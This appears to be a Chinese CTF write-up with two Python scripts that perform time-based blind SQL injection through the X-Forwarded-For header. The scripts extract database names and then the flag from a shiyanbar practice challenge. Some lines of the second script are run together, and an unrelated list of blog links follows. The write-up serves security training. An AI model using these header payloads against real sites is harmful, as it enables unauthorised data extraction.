不多说,直接使用脚本跑

 # -*- coding:utf-8 -*-

 import requests

 import string

 url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

 guess = string.lowercase+string.uppercase+string.digits+string.punctuation

 database=[]

 for database_number in range(0,100): #假设爆破前100个库

 databasename=''

 for i in range(1,100): #爆破字符串长度,假设不超过100长度

 flag=0

 for str in guess: #爆破该位置的字符

 #print 'trying ',str

 headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}

 try:

 res=requests.get(url,headers=headers,timeout=4)

 except:

 databasename+=str

 flag=1

 print '正在爆破第%d个数据库名,the databasename now is '%(database_number+1) ,databasename

 break

 if flag==0:

 break

 database.append(databasename)

 if i==1 and flag==0:

 print '扫描完成'

 break

 for i in range(len(database)):

 print database[i]

获取数据库名称

然后再获取数据表,列,flag

 #-*-coding:utf-8-*-import requestsimport string

 url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"

 guess=string.lowercase + string.uppercase + string.digits

 flag=""

 for i in range(1,100):

 havetry=0

 for str in guess:

 headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}

 try:

 res=requests.get(url,headers=headers,timeout=6)

 except requests.exceptions.ReadTimeout, e:

 havetry=1

 flag = flag + str

 print "flag:", flag

 break

 if havetry==0:

 breakprint 'result:' + flag

获取flag

(flag有点长,要跑一会儿)

随机推荐

  1. ORA-13541: system moving window baseline size (691200) greater than retention (432000)

    修改awr生成报告时间间隔和保存时间时报错,由默认的每小时生成,保存8天修改为每半个小时生成一次,保存5天: SQL, retention); , retention); END; * ERROR a ...

  2. JS浏览器滚轮事件实现横向滚动照片展

    if(window.attachEvent){ ///*IE8注册事件*/ this.oc.attachEvent('onmousewheel',function(e) { //函数体 }); } e ...

  3. Zookeeper zkui-zookeeper图形化管理工具

    zkui zkui是一个Zookeeper可视化管理工具. Github:https://github.com/DeemOpen/zkui zkui安装 1.Git拉取代码 #git clone ht ...

  4. configure -help

    http://www.360doc.com/content/14/1215/17/18578054_433158382.shtml http://blog.csdn.net/mociml/articl ...

  5. Qt VS版本添加调试器

    Qt的VS版本默认是不带调试器的,可以去百度一个WinDbg,如下图所示. 将其中的cdb.exe添加到Qt Creator构建和运行的Debuggers标签页即可,如下图所示. http://blo ...

  6. Hadoop集群(第3期)机器信息分布表

    1.分布式环境搭建 采用4台安装Linux环境的机器来构建一个小规模的分布式集群. 图1 集群的架构 其中有一台机器是Master节点,即名称节点,另外三台是Slaver节点,即数据节点.这四台机器彼 ...

  7. HTTP请求GET和POST的区别

    HTTP请求GET和POST的区别: 1.GET提交,请求的数据会附在URL之后(就是把数据放置在HTTP协议头<request-line>中), 以?分割URL和传输数据,多个参数用&a ...

  8. Python|网页转PDF,PDF转图片爬取校园课表~

    import pdfkit import requests from bs4 import BeautifulSoup from PIL import Image from pdf2image imp ...

  9. Windows下OSGEarth的编译过程

    目录 1. 依赖 1) OpenSceneGraph 2) GDAL 3) CURL 4) GEOS 5) 其他 2. 编译 1) 设置参数 2) 配置路径 3) 生成编译 3. 参考文献 1. 依赖 ...

  10. 【】input中 type=number 去掉箭头

    css中设置: input::-webkit-outer-spin-button, input::-webkit-inner-spin-button { -webkit-appearance: non ...